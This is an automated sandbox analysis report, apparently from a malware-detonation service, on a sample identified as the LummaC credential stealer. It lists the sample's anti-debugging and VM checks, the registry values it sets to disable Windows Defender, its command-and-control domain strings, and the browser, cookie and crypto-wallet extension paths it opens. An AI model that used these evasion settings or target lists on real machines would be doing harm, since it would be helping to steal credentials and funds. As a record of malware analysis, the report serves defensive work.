Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54FCC9 second address: 54FCCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 87EA8F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 87E9C6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A25E82 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: AB2B57 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Special instruction interceptor: First address: 3DDCDB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Special instruction interceptor: First address: 576A02 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Special instruction interceptor: First address: 3DB4AA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Special instruction interceptor: First address: 59AEA2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Special instruction interceptor: First address: 57CEE5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Special instruction interceptor: First address: 6096EB instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Memory allocated: 4BF0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Memory allocated: 4D90000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Memory allocated: 6D90000 memory reserve | memory write watch Jump to behavior
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Code function: 3_2_0056E4DF rdtsc 3_2_0056E4DF
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 3784 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe TID: 3332 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: file.exe, 02FQBW3AYVFKS8DMY3O.exe.0.dr Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: file.exe, 00000000.00000003.2097456466.0000000005D9B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000002.2261876972.0000000001760000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2261876972.000000000170E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2261876972.0000000001783000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2097456466.0000000005D9B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: YNVMware
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 02FQBW3AYVFKS8DMY3O.exe.0.dr Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: file.exe, 00000000.00000003.2097520696.0000000005E67000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Code function: 3_2_0056E4DF rdtsc 3_2_0056E4DF
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Code function: 3_2_003E0709 LdrInitializeThunk, 3_2_003E0709
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
LummaC encrypted strings found
Source: file.exe, 00000000.00000003.2052443941.00000000052D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: scriptyprefej.store
Source: file.exe, 00000000.00000003.2052443941.00000000052D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: navygenerayk.store
Source: file.exe, 00000000.00000003.2052443941.00000000052D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: founpiuer.store
Source: file.exe, 00000000.00000003.2052443941.00000000052D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: necklacedmny.store
Source: file.exe, 00000000.00000003.2052443941.00000000052D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: thumbystriw.store
Source: file.exe, 00000000.00000003.2052443941.00000000052D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: fadehairucw.store
Source: file.exe, 00000000.00000003.2052443941.00000000052D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: crisiwarny.store
Source: file.exe, 00000000.00000003.2052443941.00000000052D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: presticitpo.store
Source: file.exe, 00000000.00000002.2258990583.0000000000A4C000.00000040.00000001.01000000.00000003.sdmp, 02FQBW3AYVFKS8DMY3O.exe, 00000003.00000002.2410664901.0000000000598000.00000040.00000001.01000000.00000006.sdmp Binary or memory string: QProgram Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disable Windows Defender notifications (registry)
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1 Jump to behavior
Disable Windows Defender real time protection (registry)
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1 Jump to behavior
Disables Windows Defender Tamper protection
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Registry value created: TamperProtection 0 Jump to behavior
Modifies windows update settings
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations Jump to behavior
AV process strings found (often used to terminate AV products)
Source: file.exe, file.exe, 00000000.00000003.2142625341.00000000017EB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142795174.00000000017ED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: file.exe PID: 1400, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe String found in binary or memory: ets/Electrum-LTC
Source: file.exe String found in binary or memory: ElectronCash
Source: file.exe String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: file.exe String found in binary or memory: Wallets/Exodus
Source: file.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe String found in binary or memory: keystore
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
